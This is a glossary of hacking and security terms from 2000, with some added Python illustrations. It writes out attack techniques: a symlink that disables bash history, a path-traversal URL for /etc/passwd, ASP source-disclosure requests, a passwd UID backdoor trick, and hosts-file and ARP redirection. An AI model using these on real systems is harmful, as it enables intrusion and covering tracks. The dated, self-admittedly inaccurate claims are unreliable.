Hacking Lexicon

This document clarifies many of the terms used within the context of information security (infosec). My goal is not to define or explain terms, but to clarify key points and dispel misconceptions.

Source: http://www.robertgraham.com/pubs/hacking-dict.html
Version 0.3.0, June 22, 2000
Disclaimer: This document has many omissions and contains much that is apocryphal, or at least wildly inaccurate. This document does not define terms, but only clarifies what many people mean/imply when they use these terms in the context of information security. Feedback: Please send feedback to "hacking-dict@robertgraham.com". Tips: If you are trying to learn the lingo, I've tried to rate terms [1-5]; level one terms should be understood by beginners, level 4/5 terms are for experts who have no other life.

Copyright 1998-2000 by Robert Graham (hacking-dict@robertgraham.com). All rights reserved. This document may be reproduced only for non-commercial purposes. All reproductions must contain this exact copyright notice. Reproductions must not contain alterations except by permission.

- 0 -

128-bit [1]

Generally refers to strong (unbreakable) encryption. Web-browsers contain an option for 40-bit vs. 128-bit encryption. The United States only allows export of the weaker version in order to allow the government to spy on foreigners, especially during times of war (Author's note: my grandfather worked with the codebreakers in WWII -- it had a major impact indeed on winning the war). However, the U.S. export restrictions can easily be bypassed, allowing many foreigners access to products with 128-bit encryption (example: https://www.ccc.de). Likewise, the restrictions have stifled development within the United States of products that need encryption, such as IEEE 802.11 wireless Ethernet.

Key point: The debate over strong encryption is never-ending. Within the United States, law enforcement is constantly lobbying to restrict the use of strong encryption. Many resist, pointing out how often law enforcement already abuses wiretap powers (such as against Martin Luther King). At the same time, companies making products constantly lobby for the easing of export restrictions, so that they can sell strong encryption products abroad. Another funny thing is that the U.S. government's intransigence on this issue has actually led to stronger encryption abroad. U.S. export restrictions (and the desire to spy on foreigners) were one of the reasons France relaxed its own law-enforcement bans on encryption use by citizens.

Key point: The random number generators within systems are often weaker than the key itself. For example, when you connect via SSL from your browser to a webserver, they choose a key for that session. That key is chosen with a random number generator. One estimate was that the average 128-bit session key contains only 47 bits of randomness. Other browsers have had even weaker systems, allowing the session key to be recovered in only a few minutes.
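
The effect of a weak generator can be sketched in a few lines of Python. This is an illustration only: the 16-bit seed size and the names `weak_session_key` and `recover_seed` are assumptions made for the demonstration, not a description of any real browser.

```python
import random

SEED_BITS = 16  # assumed size of the generator's internal seed (hypothetical)

def weak_session_key(seed):
    """Return a 128-bit key that is fully determined by a small seed."""
    return random.Random(seed).getrandbits(128)

def recover_seed(key, seed_bits=SEED_BITS):
    """Brute-force the seed space instead of the 128-bit key space."""
    for seed in range(2 ** seed_bits):
        if weak_session_key(seed) == key:
            return seed
    return None

key = weak_session_key(12345)
print(key < 2 ** 128)        # the key fits in 128 bits
print(recover_seed(key))     # yet at most 2**16 guesses are needed to find its seed
```

The attacker never searches the 128-bit key space; the search is only as large as the randomness that went into the key.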

40-bit [1]

The term "40-bit encryption" refers to the U.S. encryption export laws (note: in January, 2000, the U.S. upped the maximum size to 64 bits). The U.S. restricts the export of "strong encryption" technology. Products that include 40-bit encryption or less can freely be exported. Therefore, products like web browsers, wireless communications, DVD keys, etc. all use 40-bit encryption.

Key point: Specialized hardware can decrypt 40-bit keys in real time. The average new desktop has enough horsepower to decrypt 40-bit messages. Thus, many people now consider 40-bit encryption to be simply obfuscated plaintext.

Key point: 40-bit often refers to the RC4 system within browsers.

56-bit [1]

56-bit encryption contains 16 more bits than 40-bit encryption, and is therefore 65536 times more difficult to crack. On the other hand, it is likewise 256 times easier to crack than 64-bit encryption.

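Key point: In 1998, the EFF built a custom machine (the "Deep Crack") for under $250,000 that could decrypt 56-bit DES encrypted messages in a matter of days. In January of 1999, working together with distributed.net, it recovered a DES key in under a day.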

Key point: 56-bit cryptography almost always refers to DES.

64-bit [1]

In January of 2000, the U.S. government eased its export regulations on encryption from 40-bit to 64-bit keys. Presumably, the government would only do so if the NSA had the capability of decrypting 64-bit encrypted messages. It is interesting to note that distributed.net's RC5-64 challenge cracking team of 100,000 computers working for about 2.5 years had managed only to check about 18% of the keyspace. This implies that the NSA has extremely hefty software.
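
The distributed.net figures can be turned into a rough rate estimate. The sketch below assumes a constant search rate and a 365-day year; the function names are made up for the illustration.

```python
KEYSPACE_BITS = 64
FRACTION_CHECKED = 0.18   # from the text: about 18% of the keyspace
YEARS_ELAPSED = 2.5       # from the text: about 2.5 years

def years_for_full_keyspace(fraction_checked, years_elapsed):
    """Time to sweep the entire keyspace at the observed (assumed constant) rate."""
    return years_elapsed / fraction_checked

def keys_per_second(bits, fraction_checked, years_elapsed):
    """Average number of keys tested per second over the elapsed period."""
    seconds = years_elapsed * 365 * 24 * 60 * 60
    return (2 ** bits) * fraction_checked / seconds

print(years_for_full_keyspace(FRACTION_CHECKED, YEARS_ELAPSED))
print(keys_per_second(KEYSPACE_BITS, FRACTION_CHECKED, YEARS_ELAPSED))
```

Under these assumptions the full sweep would take roughly 14 years at a rate of about 4 x 10^10 keys per second, which gives a sense of how much faster a dedicated cracker would have to be.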

8-character password [4]

Some systems, like Win9x and Solaris, limit the user to 8 characters in the password.

Key point: Security conscious users of such systems need to make sure they use a more random mix of characters because they cannot create long passwords.

Key point: Password cracking such systems is a little easier.

~user [3]

On UNIX, a user's home directory can be referenced by using a tilde (~) followed by the user's login name. For example, "ls ~rob" on my computer will list all the files in "/home/rob".

Key point: Web-servers often allow access to users' directories this way. An example would be http://www.robertgraham.com/~rob.

Key point: A big hole on the Internet is that people unexpectedly open up information. For example, the file .bash_history is a hidden file in a person's directory that contains the complete text of all commands they've entered into the shell (assuming their shell is "bash", which is the most popular one on Linux).

/dev/null [1]

On UNIX, this is a virtual file that can be written to. Data written to this file gets discarded. It is similar to the file called NUL on Windows machines.

Key point: When rooting a machine, hackers will often redirect logging to /dev/null. For example, the command ln -s /dev/null .bash_history will cause the system to stop logging bash commands.
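
A minimal sketch of the discard behavior, using Python's `os.devnull` (which names /dev/null on UNIX and the NUL device on Windows):

```python
import os

# Writing succeeds, but the data goes nowhere.
with open(os.devnull, "w") as sink:
    written = sink.write("this text is discarded\n")

# Reading back yields nothing: the file is always empty.
with open(os.devnull, "r") as source:
    data = source.read()

print(written, repr(data))
```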

Culture: In the vernacular, means much the same thing as "black hole". Typical usage, "if you don't like what I have to say, please direct your comments to /dev/null".

/etc [1]

The directory on UNIX where the majority of the configuration information is kept. It is roughly analogous to the Windows registry. Of particular interest is the /etc/passwd file that stores all the passwords.

Key point: If a hacker can read files from this directory, then they can likely use the information to attack the machine.

/etc/hosts [1]

The file that contains a list of hostname to IP address mappings. In the old days of the Internet, this is how machines contacted each other. A master hosts file was maintained and downloaded to machines on a regular basis. Then DNS came along. Like a vestigial appendix, the hosts file is still there but rarely needed. On Windows, this file is stored in %SystemRoot%\system32\drivers\etc.

Hack: If you can write files to a user's machine, then you can add entries to his/her hosts file to point to your own machine instead. For example, put an entry for www.microsoft.com to point to your machine, then proxy all the connections for the user. This will allow you to perform a man in the middle attack.
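
The file format is simple enough that a single added line changes where a name resolves. The sketch below parses hosts-style text; the sample entries, the 192.0.2.10 documentation address, and the choice to keep the first entry seen for a name are assumptions for illustration.

```python
def parse_hosts(text):
    """Map each hostname or alias to the address on its line."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        address, *names = line.split()
        for name in names:
            # Assumption: the first entry for a name wins.
            mapping.setdefault(name.lower(), address)
    return mapping

SAMPLE = """\
127.0.0.1   localhost
192.0.2.10  www.example.com example   # hypothetical entry
"""

print(parse_hosts(SAMPLE))
```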

/etc/passwd [1]

The UNIX file that contains the account information, such as username, password, login directory, and default shell. All normal users on the system can read this file.

Key point: The passwords are encrypted, so even though everyone can read the file, it doesn't automatically guarantee access to the system. However, programs like crack are very effective at decrypting the passwords. On any system with many accounts, there is a good chance the hacker will be able to crack some of the accounts if they get hold of this file.

Key point: Modern UNIX systems allow for "shadowed" password files, stored in locations like /etc/shadow that only root has access to. The normal password file still exists, minus the password information. This provides backwards compatibility for programs that still must access the password file for account information, but which have no interest in the passwords themselves.

Key point: The chief goal of most hacks against UNIX systems is to retrieve the password file. Many attacks do not compromise the machine directly, but are able to read files from the machine, such as this file. Typical examples include:

TFTP: Typical exploit asks for the filename "/etc/passwd". Some systems are misconfigured so that this works.
FTP: Similar to TFTP above, simply asking for the file can get it. Directory climbing sometimes works. Sometimes a shell can be exploited to reveal the file.
HTTP: Many custom web-servers (such as built-in ones used for remote management) contain directory climbing bugs that can be used to retrieve the file. Example: http://www.robertgraham.com/../../../etc/passwd.
/cgi-bin: A huge number of CGI scripts contain bugs that can be exploited to read files from the system. These include directory climbing vulnerabilities, shell vulnerabilities, as well as other stupid mistakes.
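
Directory climbing can be sketched as follows. The web root "/var/www" and the function names are hypothetical; the point is only that joining a requested path onto a root and normalizing it can land outside that root unless the result is checked.

```python
import posixpath

WEB_ROOT = "/var/www"  # hypothetical document root

def resolve(request_path):
    """Join the request onto the web root and collapse any '..' components."""
    joined = posixpath.join(WEB_ROOT, request_path.lstrip("/"))
    return posixpath.normpath(joined)

def is_inside_root(resolved):
    """True only if the resolved path is the root itself or lies beneath it."""
    return resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/")

for request in ("/index.html", "/../../../etc/passwd"):
    target = resolve(request)
    print(request, "->", target, is_inside_root(target))
```

A server that skips the `is_inside_root` check hands out whatever file the normalized path names.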

Key point: /etc/passwd is a simple text file, with one line per account. The line is broken down into seven columns:

account: The username. Note that a lot of systems ship with well-known names in their default passwd file.
password: An encrypted form of the user's password. Since they are encrypted, they are viewable by anybody who has access to the system. However, since users often choose weak passwords, hackers will often run crack programs that can decrypt the weak passwords. For this reason, admins often create a shadow password file that contains the real passwords, in which case this field will simply contain a "*".
UID: The user identifier, a unique number like "500" that identifies the user. Internally within the system, all users are referenced by their number rather than their name. One way to put a backdoor into the system is to place a string like "x500" rather than "500" in this field. This causes programs that read the file to parse this as the number "0", which is the UID for root.
GID: A primary group the user belongs to. The user can belong to secondary groups as configured in /etc/group.
GECOS: Some additional information about the account. For real users, this is often their full human readable name. For other pseudo-accounts, this may be some parameters.
directory: The user's home directory.
shell: The login shell that will be given to the user when they logon.
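
The seven columns are separated by colons, so a line can be split apart as sketched below. The sample line is made up, and `c_style_atoi` is a simplified emulation (no sign handling) of how C's atoi() treats a string with no leading digits, which is the behavior the "x500" trick relies on.

```python
FIELDS = ("account", "password", "uid", "gid", "gecos", "directory", "shell")

def parse_passwd_line(line):
    """Split one passwd-style line into its seven named fields."""
    values = line.rstrip("\n").split(":")
    if len(values) != len(FIELDS):
        raise ValueError("expected 7 colon-separated fields")
    return dict(zip(FIELDS, values))

def c_style_atoi(text):
    """Read leading decimal digits; return 0 if there are none (like atoi)."""
    digits = ""
    for ch in text.strip():
        if ch not in "0123456789":
            break
        digits += ch
    return int(digits) if digits else 0

entry = parse_passwd_line("rob:*:500:500:Robert Graham:/home/rob:/bin/bash")  # hypothetical line
print(entry["account"], entry["uid"], entry["shell"])
print(c_style_atoi("500"), c_style_atoi("x500"))
```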

/etc/services [3]

On UNIX, the configuration file /etc/services maps port numbers to named services.

Key point: Its role in life is so that programs can do a getservbyname() sockets call in their code in order to get what port they should use. For example, a POP3 email daemon would do a getservbyname("pop3", "tcp") in order to retrieve the number 110 that pop3 runs at. The idea is that if all POP3 daemons use getservbyname(), then no matter what POP3 daemon you run, you can always reconfigure its port number by editing /etc/services.

Misunderstanding: This file is a poor way to figure out what port numbers mean. If you want to find out what ports programs are using, you should instead use the program lsof to find out exactly which ports are bound to which processes. If running lsof is not appropriate, then you should look up the ports in a more generic reference.
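
The standard sockets call for this lookup is getservbyname(), which Python exposes as `socket.getservbyname`. A minimal sketch follows; the wrapper name `lookup_port` and its fallback argument are assumptions, added so the example still runs on a machine whose services database lacks the entry.

```python
import socket

def lookup_port(service, protocol="tcp", default=None):
    """Return the port registered for a service name, or `default` if the
    local services database has no such entry."""
    try:
        return socket.getservbyname(service, protocol)
    except OSError:
        return default

print(lookup_port("pop3"))                         # typically 110 where pop3 is listed
print(lookup_port("no-such-service", default=-1))  # falls back to the default
```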

- A -

Access Control List [3]

Controlling access not only to the system in general, but also to resources within the system. For example, firewalls can be configured to allow access to different portions of the network for different users. Likewise, even after you log onto a file server, the server may still block access to certain files.

Key point: An Access Control List (ACL) is used to list those accounts that have access to the resource that the list applies to. When talking about firewalls, the ACL implies the list of IP addresses that have access to which ports and systems through the firewall. When talking about WinNT, the ACL implies the list of users that can access a specific file or directory on NTFS.
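
In its simplest form an ACL is a lookup from a resource to the accounts allowed to use it. The sketch below is a toy model; the resource names, account names, and the default-deny choice are assumptions and do not reflect how any particular firewall or NTFS stores its lists.

```python
# Hypothetical resources and accounts, for illustration only.
ACL = {
    "/payroll/salaries.xls": {"alice"},
    "/public/readme.txt": {"alice", "bob"},
}

def is_allowed(user, resource, acl=ACL):
    """Grant access only if the user appears on the resource's list."""
    return user in acl.get(resource, set())   # unlisted resources are denied

print(is_allowed("alice", "/payroll/salaries.xls"))
print(is_allowed("bob", "/payroll/salaries.xls"))
```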

Contrast: Discretionary Access Control is the ability to have fine grained control over who has access to what resources.

ActiveX [1]

A type of mobile code whereby Microsoft's web browsers can automatically download executables to provide active content within web pages.

Contrast: ActiveX is similar to Java applets, except that the code is not "sandboxed": it has full access to the operating system. In order to stop hostile code, ActiveX relies upon digital signatures and "zones". Microsoft browsers are configured to trust ActiveX programs from servers in the "trusted" zone, to trust signed ActiveX programs from servers in less trusted zones, and to prompt/deny unsigned ActiveX applets from untrusted zones.

Controversy: The idea of trusted zones and signed applets works pretty well in theory, but doesn't always work well in practice. The problem is that it relies upon all users making the correct choices all the time. The Melissa virus/worm proved that this philosophy is not adequate.

algorithm [1]

A series of steps specifying which actions to take in which order. In the security field, this general term usually refers to an encryption algorithm.

Analogy: A cookbook recipe is an algorithm.

Key point: Different algorithms have different levels of complexity. For example, consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.

This problem demonstrates an algorithm of exponential complexity. For the first 10 squares of the chess board, the series is: 1 2 4 8 16 32 64 128 256 512. Thus, for the first 10 squares, roughly a thousand grains must be paid out. However, the series continues (using k=1024): 1k 2k 4k 8k 16k 32k 64k 128k 256k 512k. Thus, for the first 20 squares, roughly a million grains must be paid out. After 30 squares, roughly a billion grains must be paid out. For 40 squares, roughly a trillion grains must be paid out.

This is directly related to such things as key size. A 41-bit key is twice as hard to crack as a 40-bit key. A 50-bit key is a thousand times harder. A 60-bit key is a million times harder. This is why the 128-bit vs. 40-bit encryption debate is so important: 128-bit keys are 2^88 times (roughly 300 trillion trillion times) harder to crack (via brute force) than 40-bit keys.
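
The doubling arithmetic can be checked directly. In this sketch the function names are made up; the only assumption is that brute-force effort is proportional to the number of possible keys.

```python
def grains_through(square):
    """Total grains paid out for squares 1..square (1 + 2 + 4 + ...)."""
    return 2 ** square - 1

def relative_difficulty(bits_a, bits_b):
    """How many times larger the keyspace of bits_a is than that of bits_b."""
    return 2 ** (bits_a - bits_b)

for square in (10, 20, 30, 40):
    print(square, grains_through(square))

for bits in (41, 50, 60, 128):
    print(bits, relative_difficulty(bits, 40))
```

The 128-bit line prints 2**88, a number on the order of 10^26.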

Key point: Most algorithms are public, meaning that somebody trying to decrypt your message knows all the details of the algorithm. Consequently, the message is protected solely by the key. Many people try to add additional protection by making the details of the algorithm secret as well. Experience so far has led to the belief that this actually leads to weaker security for two reasons. First, such secrets always get discovered eventually, so if security depends upon this secret, it will eventually be broken. Secondly, human intelligence is such that someone cannot create a secure algorithm on his/her own. Therefore, only by working with a community of experts over many years can humans create a secure algorithm. To date, only two such communities exist: the entire world of cryptography experts publishing the details of their work and trying to break other people's work, and the tightly knit community of cryptography experts working in secret for the NSA.

ANI (Automatic Number Identification)[3]

(U.S.) In telephones, ANI identifies the caller to the recipient. In most cases, ANI cannot be blocked, such as when dialing 800 lines. Consumer caller-ID is essentially based upon ANI functionality. (Consumers can prevent caller-ID from working so that other consumers don't receive it, but they cannot block ANI when dialing 800 lines).

anonymous [2]

Anonymity is one of the "holy grails" of hacking.

Key point: Anonymous e-mail services like Hotmail put the IP address of the person sending the e-mail in the headers (which are normally hidden from view by e-mail clients). Many would-be hackers get caught this way.

ASP (Active Server Pages)[3]

The server-side scripting language for Microsoft IIS web server.

Key point: A recurring bug in ASP has allowed hackers to read the script rather than the output of the script. These techniques rely upon changing the name of the script such that the server no longer recognizes it as a script, but as a file instead. Some techniques that have worked in the past have been:

/default.asp.: The file system automatically strips trailing dots because of the way Windows hides/appends file extensions.
/default.asp%2E: Same bug as above. Microsoft released a patch whereby the webserver checks for the appended dot. However, url-encoding the dot bypasses this quick fix.
/default.asp::$DATA: In order to support Macintoshes and other features, NTFS supports a feature known as alternate datastreams. The well-known stream called "::$DATA" references the original
/default.asp%8129: Far east editions will expose the source when a Unicode character is appended.
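
The first two tricks can be sketched as a check that runs before the name is canonicalized. Both function names are hypothetical and this is not how IIS is implemented; it only illustrates why testing the raw request string misses the trailing dot and its URL-encoded form.

```python
from urllib.parse import unquote

def looks_like_script(path):
    """Hypothetical naive check: a request is a script only if it ends in .asp."""
    return path.lower().endswith(".asp")

def canonical_name(path):
    """Decode URL escapes, then drop the trailing dots the file system ignores."""
    return unquote(path).rstrip(".")

for request in ("/default.asp", "/default.asp.", "/default.asp%2E"):
    print(request,
          looks_like_script(request),                   # check on the raw request
          looks_like_script(canonical_name(request)))   # check after canonicalizing
```

Only the check made after canonicalizing treats all three requests as the same script.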

ARP [3]

ARP is a protocol used with TCP/IP to resolve addresses. The TCP/IP stack used to transmit data across the Internet is independent from the Ethernet used to shuttle data between local machines. Thus, when a machine needs to send an IP packet to a nearby machine, it broadcasts the IP address on the local Ethernet asking for the corresponding Ethernet address. The machine that owns the address responds, at which point the IP packet in question is sent to that Ethernet address.

Key point: By sniffing ARP packets off the wire, you can discover a lot of stuff going on. This is especially true of cable-modem and DSL segments. Since ARP packets are broadcasts, you aren't technically breaking your user agreement by sniffing.

Key point: You can spoof ARP requests and/or responses in order to redirect traffic through your machine.
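
Why spoofing works can be seen in a toy model of an ARP cache. The class below is a simulation only, with made-up addresses, and it assumes a cache that accepts whatever reply arrived last; it sends no packets.

```python
class ArpCache:
    """Toy model of a host's ARP cache; replies are accepted without verification."""

    def __init__(self):
        self.table = {}

    def handle_reply(self, ip, mac):
        # Whoever answers last wins: nothing ties a reply to the real owner.
        self.table[ip] = mac

    def lookup(self, ip):
        return self.table.get(ip)

cache = ArpCache()
cache.handle_reply("192.0.2.1", "00:00:5e:00:53:01")  # genuine owner (made-up MAC)
cache.handle_reply("192.0.2.1", "00:00:5e:00:53:99")  # forged reply (made-up MAC)
print(cache.lookup("192.0.2.1"))  # packets for this IP now go to the forged address
```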

attack [1]

In security, the word attack has taken on very specific connotations. For example, you might hear of researchers trying to "attack a cryptosystem". The word is often used in the abstract sense rather than in any physical sense. In academic circles, this word is often used in preference to other synonyms such as crack or break.

Example: Some classifications of attacks are:

passive vs. active attacks: A passive attack (like sniffing) is one that can take place by eavesdropping. An active attack is one that requires interaction, such as injecting something into the data stream or altering data. All attacks are divided into these two categories. Note that active attacks can in theory be detected, while passive attacks cannot be.
hit and run vs. persistent attacks: A ping of death is a hit and run attack because it quickly crashes a machine. A smurf attack is persistent because the victim is affected only as long as the smurf lasts. As soon as the attacker stops smurfing, the victim's link becomes active again.
replay attack: An active attack where you try to capture parts of a message then resend it at a later date, often with slight alterations. For example, on older Windows LAN Manager protocols, a hash of the password is sent. Therefore, anybody could write their own SMB protocol stack and replay the hash in order to break into the system.
brute force attack: Tirelessly tries all combinations until they can break in.
man in the middle attack: Either eavesdrops on an existing connection, or interposes himself in the middle of a connection changing data.
hijack: Takes over one side of an existing connection.
sniffing/wiretap/eavesdropping: A passive attack consisting of eavesdropping on a network connection.
rewrite: An attack that alters an encrypted message without first decrypting it. Block-ciphers

authentication [3]

In cryptography, authentication is the method used to verify something is what it claims to be. The antonym of authentication is forgery.

Example: When you log in with your username and give the password, you are authenticating yourself to the system. You are proving that you are you because, in theory, only you know your password.

Key point: Abstractly, anything that combats forgery is called authentication. For example, IPsec includes an Authentication Header (AH) that proves that a packet hasn't been modified in transit.

Contrast: Note that there is a small difference between authentication and authorization. In one case, once you authenticate somebody's identity, your next step is to figure out if they are authorized to do what they are asking to do (i.e. log onto the server). In other cases, authorization is independent from authentication, such as not allowing anybody to logon after midnight.

Examples:

biometrics: Signature (handwriting), facial features, fingerprint, etc.
smart-card
passwords
digital certificates

- B -

back channel [4]

Where the compromised system opens a connection back to the hacker.

Contrast: Remote administration trojans (RATs) are NOT examples of back channels, but are instead forward channels. A RAT allows the hacker to contact the system from anywhere in the world, and allows the hacker to hide where he/she is coming from. A back channel, on the other hand, will contact the hacker, who must have a fixed IP address. This clearly fingers who the hacker is.

Key point: Typical back channel protocols are X Windows (xterm) and shells like Telnet. These programs are often built into the victim's system, so many attacks that can't otherwise compromise the system can still trigger a back channel that allows a remote shell.

See also: covert channel

back door [3]

Something a hacker leaves behind on a system in order to be able to get back in at a later time.

Example:

A Y2K programmer comes in to fix your banking code, but leaves behind something in the software that allows him to log into an ATM and withdraw lots of money.
Somebody walking by your computer notices that you are logged in with root/administrator privileges. She creates her own account that will allow her to get back into the system at a later date.
A hacker breaks into your UNIX machine and installs what is known as a "rootkit": a series of programs and configuration errors that will allow the hacker back into the system. There are so many items in a rootkit that it is unlikely the owner of the system can clean the entire thing out.
When a hacker breaks into your system, he leaves behind a program that will allow him to log in with a special username/password.
A hacker sends you a Trojan that installs a backdoor when you run it.

Key point: Key features of backdoors are:

They try to evade traditional "cleanup" methods. E.g. even if the administrator changes all the passwords, cleans the registry/config files, and removes all the suspect software, a good backdoor will still be live on the system.
They try to evade logging: if every incoming connection to the system is logged, there is a good chance the backdoor provides a way to log in without being logged.
They hide well. If you scan the system looking for suspect software, there is a good chance the backdoor has used techniques to hide from this scan.

Key point: Back doors are frequently programmed into systems either benignly or maliciously. Most computers shipped today allow BIOS passwords to be set that will prevent the booting of the computer without the administrator first typing the password. However, since many people lose their password, such BIOSes often have a back door password that allows the real password to be reset. Similarly, a lot of remotely manageable network equipment (routers, switches, dialup banks, etc.) has backdoors for remote Telnet or SNMP. The frequency of such back doors is due to the fact that people are stupid, set passwords, forget them, then whine to customer support.

Key point: A backdoor can be added to any system. For example, when generating random session keys, a programmer may actually subvert the random number generator. Such subversion would then allow decrypting of the message by those who knew the specifics. This has already been done accidentally; some paranoids believe that some encryption products do this intentionally in order to get export approval of 128-bit products.

banner [3]

Many text-based protocols will issue text banners when you connect to the service. These can usually be used to fingerprint the OS or service.

Key point: Many banners reveal the exact version of the product. Over time, exploits are found for specific versions of products. Therefore, the intruder can simply look up the version numbers in a list to find which exploit will work on the system. In the examples below, the version numbers that reveal the service has known exploitable weaknesses are highlighted.

Example: The example below is a RedHat Linux box with most of the default services enabled. The examples below show only the text-based services that show banners upon connection (in some cases, a little bit of input was provided in order to trigger the banners). Note that this is an older version of Linux; exploits exist for most of these services that would allow a hacker to break into this box (most are buffer-overflow exploits).

Protocol	Port	Banner
FTP	21	`220 rh5.robertgraham.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov 1 03:08:32 EST 1997) ready.`
ssh	22	`SSH-2.0-2.1.0 SSH Secure Shell (non-commercial)`
Telnet	23	`Red Hat Linux release 5.0 (Hurricane) Kernel 2.0.31 on an i486 login:`
SMTP	25	`220 rh5.robertgraham.com ESMTP Sendmail 8.8.7/8.8.7; Mon, 29 Nov 1999 23:28:31 -0800`
finger	79	Login Name Tty Idle Login Time Office Office Phone rob Robert David Graham p0 Nov 29 22:51 (gandalf) root root p1 Nov 29 23:34 (10.17.128.201:0.0)
HTTP	80	`HTTP/1.0 200 OK Date: Tue, 30 Nov 1999 07:34:59 GMT Server: Apache/1.2.4 Last-Modified: Thu, 06 Nov 1997 18:20:06 GMT Accept-Ranges: bytes Content-Length: 1928 Content-Type: text/html`
POP3	110	`+OK POP3 rh5.robertgraham.com v4.39 server ready`
identd	113	`0 , 0 : ERROR : UNKNOWN-ERROR`
IMAP4	143	`* OK rh5.robertgraham.com IMAP4rev1 v10.190 server ready`
lp	515	`lpd: lp: Malformed from address`
uucp	540	`login:`
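
Pulling a product and version out of a banner takes only a pattern match, which is why banners are so useful for fingerprinting. The sketch below is illustrative: the regular expression and the short list of product names it recognizes are assumptions, chosen to fit three of the banners in the table above.

```python
import re

# Assumed pattern: a known product name, a separator, then a dotted version.
BANNER_VERSION = re.compile(r"(Sendmail|Apache|wu)[ /-](\d+(?:\.\d+)+)")

def product_version(banner):
    """Return (product, version) if the banner names a recognized product."""
    match = BANNER_VERSION.search(banner)
    return (match.group(1), match.group(2)) if match else None

banners = [
    "220 rh5.robertgraham.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov 1 03:08:32 EST 1997) ready.",
    "220 rh5.robertgraham.com ESMTP Sendmail 8.8.7/8.8.7; Mon, 29 Nov 1999 23:28:31 -0800",
    "HTTP/1.0 200 OK Date: Tue, 30 Nov 1999 07:34:59 GMT Server: Apache/1.2.4",
    "+OK POP3 rh5.robertgraham.com v4.39 server ready",
]

for banner in banners:
    print(product_version(banner))
```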

Defenses: Many systems allow banners to be suppressed. You should read the software documentation for more information on this.

BGP (Border Gateway Protocol)[3]

On the Internet, BGP is used between ISPs in order to communicate routes. For example, imagine that the ALICE ISP needs to reach the BOB ISP. However, ALICE is not directly connected to BOB. ALICE therefore must figure out which ISP should be used to send traffic to BOB. It is through the use of BGP that such information is discovered. The name "border" comes from the fact that ISPs use BGP only on their borders (in contrast, they would use some other protocol, like OSPF, inside their networks).

Key point: BGP can be subverted in numerous ways. BGP is generally unauthenticated, and rogue ISPs can play havoc.

biometrics [3]

In the field of authentication, biometrics is the method whereby a person is recognized according to personal traits, presumably ones they cannot alter. Typical examples are signatures we sign on documents and facial recognition that we use in everyday life.

Example: retina, iris, palm print, fingerprint, thumbprint, hand geometry, handwriting, signature, speech/voice, gait, typing characteristics, scent, facial features, DNA

Contrast: There are roughly three "factors" used in authentication:

physical (what you have): car keys, subway tokens, driver's license, passport, credit cards, ID cards, smart cards
knowledge (what you know): PINs, usernames/passwords, account numbers
biometrics (who you are): signature, what you look like, etc.

Contrast: Biometrics is based upon your real identity (who you are). Most other authentication methods are based upon a virtual identity. Your username/password doesn't identify you, but your account on the computer. Similarly, root on a UNIX machine isn't a real person, but a role account.

Key point: Biometrics has a number of problems. The first is that biometrics degrade over time. People's signatures change over time. An injury can change fingerprints. Voice recognition systems fail when people have colds. Thus, biometric systems fail quite often.

BIOS [3]

On your PC, the BIOS is the software that first runs when your computer starts up. All the messages you see when it starts up are from the BIOS program. Once it gets through testing memory and configuring your system, it then "boots" the operating system that you've installed on your hard-disk.

Key point: The BIOS stores configuration settings in NVRAM (Non-Volatile RAM). Remember that the contents of your normal RAM/memory are lost when you power-off your computer. The contents of NVRAM, in contrast, are retained when power goes off. Most NVRAM consists of CMOS (low-power) chips with a small battery that constantly feeds power to the chips (such batteries last about 5 years). A common trick of hackers and viruses is to corrupt the CMOS settings, causing the computer to fail to boot. Removing the battery connection (usually a jumper on the motherboard) will cause the CMOS settings to be lost and be reset back to the default (good) state.

Key point: All of today's BIOSes are stored in programmable ROMs, which allows them to be reprogrammed (usually with bug fixes from the manufacturer). This allows the hacker to reprogram them as well. While in theory the hacker could reprogram his/her own code into the BIOS, in practice this has not been done yet. Instead, hackers can sometimes use this programming feature to corrupt the BIOS code (in much the same way they corrupt the BIOS settings mentioned above). This will usually prevent the system from booting even to a point where a fresh BIOS can be re-programmed into the system. This requires that the system be brought back to the vendor in order to have the BIOS reprogrammed. Note that you can often set a jumper on the motherboard that denies the ability to reprogram the BIOS.

bit [1]

A numeric quantity with precisely two values, such as 0 and 1, false and true, up or down, and so forth.

Key point: In many contexts, each additional bit means "twice as much". 8 extra bits means 256 times as much. 16 extra bits means 65536 times as much. Therefore, it takes 65536 times longer to brute force crack a 56-bit key than a 40-bit key.

bomb (logic bomb or mail bomb)[3]

The word bomb has two unrelated meanings: logic bombs and mail bombs.

In the class of hostile software, a logic bomb is some code left behind by a program that "goes off" at a particular time (such as deleting all the files on the computer on New Years Eve). One theory was that Y2K consultants left logic bombs inside the code they were fixing in order to earn even more money after Y2K.

A mail bomb is the effect of sending somebody tons of e-mail, overloading their mailbox and/or network connection. Sometimes this can be done with a program, other times it can be done simply by signing up the victim to huge numbers of e-mailing lists. Finally, it can be accidental, as happened once to Apple Computer when its mailing list software got out of control.

History: In the old days of UNIX terminals, an e-mail message containing VT100 control codes in a logic bomb could completely hose a user's terminal, forcing them to log out. DOS machines supporting the ANSI.SYS driver also had that problem.

bootp (boot protocol)[1]

This relatively ancient protocol facilitates booting devices ("clients") from a network server rather than from their local hard disks (such as diskless workstations). In this configuration, the bootp protocol gives the diskless device its IP configuration information as well as the name of the file server. At this point, the client shifts to TFTP to download the actual files it will boot from.

Key point: DHCP is simply an extension on top of bootp. This is important because without an IP address, clients cannot reach bootp servers that reside across routers. Virtually all routers have an extension for bootp forwarding that fixes this issue. Since DHCP had the same requirements, the designers just stuck it inside bootp packets rather than requiring yet another change to the routing infrastructure.

boot sector (boot record)[1]

The first sector on a drive, from which the operating system bootstraps.

Key point: Until macro viruses came along, boot sector viruses were the most common variant. They spread through companies via floppy disks. Users would leave floppy disks in the drive and when the computer restarted, it would attempt to boot from the floppy. This would run the virus, which then infected the boot sector on the hard drive. Any further floppies inserted into the system would then be infected by the virus.

Countermeasures: I worked at a company with anal anti-virus procedures (anti-virus on all desktops, regular wiping of floppy disks). It was never able to completely free itself from the boot sector virus problem; one of the viruses was never successfully eradicated from the company. My own personal policy is to disconnect the floppies on 90% of the machines, and disable floppy bootup on the remaining machines.

'bot [2]

Short for robot, a 'bot is an automated program that does something.

